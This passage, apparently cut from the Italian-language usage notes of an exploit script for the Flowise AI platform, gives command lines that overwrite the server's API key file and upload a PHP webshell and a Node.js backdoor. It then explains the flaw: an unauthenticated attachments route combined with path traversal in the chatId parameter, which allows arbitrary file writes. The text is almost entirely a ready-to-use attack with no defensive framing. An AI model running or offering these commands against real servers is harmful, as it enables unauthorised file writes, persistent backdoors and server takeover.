
python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Genera e carica automaticamente una webshell
python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php
python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js
Principio dell'attacco La rotta /api/v1/attachments è nella whitelist e non richiede autenticazione Path traversal manipolando il parametro chatId (../../../) Carica file arbitrari in qualsiasi posizione del filesystem del server